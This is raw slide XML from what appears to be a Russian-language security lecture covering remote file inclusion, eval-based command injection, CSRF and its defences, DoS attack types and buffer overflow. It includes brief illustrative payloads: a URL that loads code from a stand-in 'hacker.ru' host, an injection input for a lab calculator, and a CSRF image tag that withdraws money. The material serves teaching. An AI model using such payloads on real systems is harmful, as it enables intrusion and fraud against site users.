                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>и</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>набирает в браузере:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://site.php?module=http://hacker.ru/hack</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Text Box 3"/>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B61C002B-21DE-4A37-A5D2-AB78F4D7E14F}"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5"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Другие инъекции</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1719360"/>
            <a:ext cx="8227440" cy="4409640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Примеры реализации протокола CALC из лаб. работы №6 на ruby, python, nodejs, php уязвимы из-за строчки в коде:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>eval(words[2]+words[1]+words[3])</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Если вместо операции и аргументов подставить команды, то они исполнятся на сервере:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CALC</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> ("</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> print</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="arn-CL" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> )</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="407" name="Text Box 3"/>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77A66205-59F4-4174-994D-106785D8B099}"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8"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>CSRF – подделка межсайтовых запросов</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1571760"/>
            <a:ext cx="9141840" cy="4998600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>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Вынуждение выполнения каких-либо действий на уязвимом сайте от лица жертвы (изменение пароля, секретного вопроса для восстановления пароля, почты, добавление администратора, эксплуатация пассивных XSS и т.д.)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Пример:</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> Привет, Алиса! Посмотри, какой милый котик: &lt;img src="http://bank.com/withdraw?</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="3000"/>
            </a:br>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>account=Alice&amp;amount=1000000&amp;for=Hacker"&gt;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="410" name="Text Box 3"/>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0018CDE9-DDF6-486C-8FD0-BAD728058F32}"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1" name="Text Box 12"/>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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Защита от CSRF</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Text Box 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1571760"/>
            <a:ext cx="9141840" cy="4998600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="765"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1984"/>
              </a:spcAft>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Генерация уникальных CSRF-токенов при каждом показе формы</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="765"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1701"/>
              </a:spcAft>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SameSite cookies - атрибут SameSite для cookie со значениями: Strict (cookie не отправляются при переходе по ссылке с другого сайта), Lax (по ссылкам — да, но при POST, AJAX - нет)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>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Верификация HTTP-заголовков Referer/Origin</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Text Box 14"/>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11D08689-A4FD-4801-972A-A53A7F2C588D}"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4"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en-US" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DDoS - </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отказ в обслуживании</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Text Box 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="214200" y="1500120"/>
            <a:ext cx="8784720" cy="5141520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>1996 г. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>пакеты длиннее 65 Кб (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ping of death)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="339840" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>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800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>лавинные атаки</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>цель атаки выполняет больше действий, чем атакующая сторона</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(недостаточное противодействие автоматизации)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>распределенные атаки </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>(Distributed</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Denial of Service)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN-атака</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>отправка множества запросов (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>) на установление </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>TCP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>соединения</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="689040" indent="-347760" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>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400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Эхо-атака</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> отправка серии широковещательных </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>ICMP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>запросов с </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>адресом отправителя, подмененным на </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t> жертвы. Ответы – переполнят сеть жертвы. </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6"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DoS-атака с помощью CtrlR</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="417" name="Picture 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2000160" y="1428840"/>
            <a:ext cx="4855680" cy="5484240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="418" name="Text Box 3"/>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59480172-9C06-4727-949B-2CC2D4325C29}"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1" dur="indefinite" restart="never" nodeType="tmRoot">
          <p:childTnLst>
            <p:seq>
              <p:cTn id="12" dur="indefinite" nodeType="mainSeq">
                <p:childTnLst>
                  <p:par>
                    <p:cTn id="13" nodeType="clickEffect" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="14" nodeType="withEffect" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="15" nodeType="clickEffect" fill="hold" presetClass="entr" presetID="35">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="417"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="17" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="18" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="720"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="19" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="repl">
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="417"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>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9"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marL="343080" indent="-339840" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="ru-RU" sz="3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Переполнение буфера</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3900" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="420" name="Text Box 2"/>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E3863220-A8C3-40B4-8075-B5472AEC3887}"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pic>
        <p:nvPicPr>
          <p:cNvPr id="421" name="Picture 3" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1357200" y="1571760"/>
            <a:ext cx="6141600" cy="5147640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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2"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3900" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="330066"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Переполнение буфера</a:t>
            </a:r>
